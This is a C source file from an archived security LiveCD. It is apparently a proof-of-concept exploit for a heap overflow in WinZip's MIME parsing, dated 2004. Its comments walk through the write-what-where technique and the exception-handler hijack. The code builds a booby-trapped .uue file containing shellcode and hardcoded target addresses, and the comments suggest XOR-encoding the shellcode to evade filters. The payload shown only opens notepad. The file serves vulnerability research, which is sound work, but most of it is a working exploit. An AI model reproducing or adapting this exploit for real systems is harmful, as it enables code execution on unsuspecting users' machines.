home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / packer / winzip / winZipMIMEArchiveBufferOverflowExp.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  6.3 KB  |  276 lines
  1.  
  2.  
  3. /*
  4.  *  Author: snooq       
  5.  *  Date: 14 April 2004  
  6.  *
  7.  *  This is a PoC exploit for WinZip32 MIME Parsing Overflow
  8.  *  bug reported by iDefense on 27 February 2004.
  9.  *
  10.  *  The original advisory is found here:
  11.  *  http://www.idefense.com/application/poi/display?id=76
  12.  *
  13.  *  This version is SP dependent becoz my idiotic shellcode
  14.  *  uses hardcoded addresses.... =p 
  15.  *  
  16.  *  So, test it locally only. Afterall, it's just a PoC rite?
  17.  *  Nonetheless, it's possible to make it more portable by 
  18.  *  using a universal shellcode... 
  19.  *
  20.  *  but beware... chars like <>,.:;'"=[]\/ are filtered...
  21.  *  so feel free to XOR it.. =p
  22.  *
  23.  *  Notes
  24.  *  =====
  25.  *  1) Tested against WinZip 8.1 on WinXP SP1, Win2K SP1 only
  26.  *
  27.  *  2) You need to first launch WinZip before you 'Open'
  28.  *
  29.  *  3) Double clicking the 'uue' won't work 
  30.  *     why so? go figure it out urself... =p 
  31.  *     once u know why... u'd then know how to fix it...
  32.  *
  33.  *  Greetz
  34.  *  ======
  35.  *  # eugene, nam, jf, valmont and the rest..
  36.  *  # sk, shashank + Security_Auditors folks...
  37.  *  # iDefense folks... SiG^2 guys etc...
  38.  *  # lastly.. Greg Hoglund for his 'Cross Page' stuffs... =p
  39.  */
  40.  
  41. /*
  42.  *  A snapshot of the 'crash'
  43.  *  =========================
  44.  *
  45.  *  Our buffer on the heap looks like this:
  46.  *  
  47.  *  [....AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEEEEEEEEEEEEEEE....]
  48.  *  |--- heap grows this way --------->
  49.  *
  50.  *   
  51.  *  and the CPU is about to execute the following code:
  52.  *
  53.  *  0049BFFC  |> 8B4C13 08      MOV ECX,DWORD PTR DS:[EBX+EDX+8]
  54.  *  0049C000  |. 8B7C13 04      MOV EDI,DWORD PTR DS:[EBX+EDX+4]
  55.  *  0049C004  |. 8979 04        MOV DWORD PTR DS:[ECX+4],EDI
  56.  *  0049C007  |. 8B4C13 04      MOV ECX,DWORD PTR DS:[EBX+EDX+4]
  57.  *  0049C00B  |. 8B7C13 08      MOV EDI,DWORD PTR DS:[EBX+EDX+8]
  58.  *  0049C00F  |. 035D F8        ADD EBX,DWORD PTR SS:[EBP-8]
  59.  *  0049C012  |. 8979 08        MOV DWORD PTR DS:[ECX+8],EDI
  60.  *  0049C015  |. 895D F4        MOV DWORD PTR SS:[EBP-C],EBX
  61.  *
  62.  *  and, EBX register seems to be under our control... =p
  63.  *
  64.  *  EDX = ptr to 'DDDD'    
  65.  *  EBX = 'DDDD' - 1        
  66.  *
  67.  *  By carefully choosing a value for EBX, we are able to manipulate
  68.  *  ECX at 0049BFFC and EDI at 0049C000.
  69.  *
  70.  *  If we set 'DDDD'=0xfffffff5 (-11), 
  71.  *  
  72.  *  -> EBX would be '0xfffffff4' (-12)
  73.  *  -> [EBX+EDX+8] becomes [EDX-4] and ECX = 'CCCC'
  74.  *  -> [EBX+EDX+4] becomes [EDX-8] and EDI = 'BBBB'
  75.  *
  76.  *  Effectively at 0049C004, we can write a DWORD 'BBBB' to ['CCCC'+4]
  77.  *  After that.....
  78.  *
  79.  *  -> [EBX+EDX+4] becomes [EDX-8] and ECX = 'BBBB'
  80.  *  -> [EBX+EDX+8] becomes [EDX-4] and EDI = 'CCCC' 
  81.  *  
  82.  *  Finally we reach MOV DWORD PTR DS:['BBBB'+8],'CCCC' at 0049C012..
  83.  *
  84.  *  Choosing the rite values for 'BBBB' + 'CCCC', execution flow could
  85.  *  be reliably diverted into our shellcode.
  86.  *
  87.  *  In this exploit, I've chosen to install our code as the main thread's
  88.  *  top exception handler so that when exception is triggered at 0049C012,
  89.  *  our code will be called to 'handle' it... =p
  90.  *
  91.  *  This is how I did it but I'm not sure if this is the best way.
  92.  *  If you know of any other better way to exploit this.....
  93.  *  pleaseeeeee tell me....... :)
  94.  *
  95.  */
  96.  
  97. #include <windows.h>
  98. #include <stdlib.h>
  99. #include <stdio.h>
  100.  
  101. #define TARGET    1
  102. #define NOP    0x90
  103.  
  104. /*
  105.  * Gap for NOPs (not really needed)
  106.  */
  107. #define PAD    0        
  108.  
  109. /*
  110.  * This 'RANGE' nonsense was useful
  111.  * in locating the 'index', i.e. 'DDDD'
  112.  */
  113. #define RANGE    1*4        
  114.  
  115. /*
  116.  * Where we control the 'index',
  117.  * i.e EBX register's value
  118.  */
  119. #define IDXOFF    268-RANGE+4 
  120.  
  121. /*
  122.  * We find our 'where' + 'what' here...
  123.  */
  124. #define OFFSET    IDXOFF-8    
  125.  
  126. /*
  127.  * -12 bytes from 'index' into where
  128.  * 'where'+'what' are...
  129.  */
  130. #define INDEX    0xfffffff5     
  131.  
  132. #define BSIZE    1024
  133. #define FNAME    "snooq.uue"
  134. #define SSIZE    sizeof(shellcode)-1
  135. #define HSIZE    sizeof(header)-1
  136.  
  137. char buff[BSIZE];
  138. long where, what;
  139.  
  140. struct {
  141.     char *os;
  142.     long topSEH;
  143.     long jmpADD;
  144. }
  145.  
  146. targets[] = {
  147.     {
  148.         "Window XP (en) SP1",
  149.         0x7ffddffe,    // Per Thread Top SEH - 2
  150.         0xf27cffff  // [this address + 4] -> shellcode
  151.     },
  152.     {
  153.         "Window 2000 (en) SP1",
  154.         0x7ffddffe,    // Per Thread Top SEH - 2
  155.         0xf354ffff  // [this address + 4] -> shellcode
  156.     },
  157. }, v;
  158.  
  159. /*
  160.  * Harmless payload that spawns 'notepad.exe'... =p
  161.  */
  162.  
  163. char shellcode[]=
  164.     "\x55"                    // push ebp 
  165.     "\x8b\xec"                // mov ebp, esp
  166.     "\x33\xf6"                // xor esi, esi
  167.     "\x56"                    // push esi
  168.     "\x68\x2e\x65\x78\x65"    // push 'exe.'
  169.     "\x68\x65\x70\x61\x64"    // push 'dape'
  170.     "\x68\x90\x6e\x6f\x74"    // push 'ton'
  171.     "\x46"                    // inc esi        
  172.     "\x56"                    // push esi
  173.     "\x8d\x7d\xf1"            // lea edi, [ebp-0xf]    
  174.     "\x57"                    // push edi        
  175.     "\xb8XXXX"                // mov eax, XXXX -> WinExec()  
  176.     "\xff\xd0"                // call eax
  177.     "\x4e"                    // dec esi
  178.     "\x56"                    // push esi
  179.     "\xb8YYYY"                // mov eax, YYYY -> ExitProcess()  
  180.     "\xff\xd0";                // call eax
  181.  
  182. char header[]="Content-Type: multipart/mixed; boundary=";
  183.  
  184. void err_exit(char *s)
  185. {
  186.     printf("%s\n",s);
  187.     exit(0);
  188. }
  189.  
  190. void filladdr()
  191. {
  192.     char *ptr;
  193.     int i=0, index=INDEX, idxoff=IDXOFF;
  194.  
  195.     long addr1=(long)WinExec;
  196.     long addr2=(long)ExitProcess;
  197.  
  198.     printf("-> WinExec() is at: 0x%08x\n",addr1);
  199.     printf("-> ExitProcess() is at: 0x%08x\n",addr2);
  200.  
  201.     ptr=shellcode;
  202.  
  203.     while (*ptr!='\0') {
  204.         if (*((long *)ptr)==0x58585858) {
  205.             printf("-> Filling in WinExec at offset: %d\n",(ptr-shellcode));
  206.             *((long *)ptr)=addr1;
  207.         }
  208.         if (*((long *)ptr)==0x59595959) {
  209.             printf("-> Filling in ExitProcess at offset: %d\n",(ptr-shellcode));
  210.             *((long *)ptr)=addr2;
  211.         }
  212.         ptr++;
  213.     }
  214.  
  215.     ptr=buff+HSIZE+OFFSET;
  216.     printf("-> 'what' == 0x%08x at offset %d\n",what,OFFSET);
  217.     *((long *)ptr)=what;
  218.  
  219.     ptr+=4;
  220.     printf("-> 'where' == 0x%08x at offset %d\n",where,OFFSET+4);
  221.     *((long *)ptr)=where-4;
  222.  
  223.     ptr=buff+HSIZE+idxoff;
  224.  
  225.     for (;i<RANGE;i+=4) {
  226.         printf("-> 'index' == 0x%08x at offset %d\n",index-i,idxoff+i);
  227.         *((long *)(ptr+i))=index-i;
  228.     }
  229.  
  230. }
  231.  
  232. void buildfile() 
  233. {
  234.     int i=0;
  235.  
  236.     FILE *fd;
  237.  
  238.     if ((fd=fopen(FNAME,"w"))==NULL) {
  239.         err_exit("-> Failed to generate file...");
  240.     }
  241.  
  242.     for(;i<sizeof(buff);) {
  243.         fprintf(fd,"%c",buff[i++]);
  244.     }
  245.  
  246.     fclose(fd);
  247.  
  248.     printf("-> '%s' generated....\n",FNAME);
  249.  
  250. }
  251.  
  252. int main(int argc, char *argv[]) 
  253. {
  254.     int i=0, t=TARGET;
  255.  
  256.     if (argc==2) { t=atoi(argv[1]); }
  257.  
  258.     where=targets[t-1].topSEH;
  259.     what=targets[t-1].jmpADD;
  260.  
  261.     printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [jinyean@hotmail.com]\n\n");
  262.  
  263.     memset(buff,NOP,BSIZE);
  264.     printf("-> Generating 'uue' file for target #%d...\n",t);
  265.     memcpy(buff,header,HSIZE);
  266.     filladdr();
  267.     memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE);
  268.     buildfile();
  269.  
  270.     return 0;
  271.  
  272. }
  273.  
  274.  
  275.  
  276.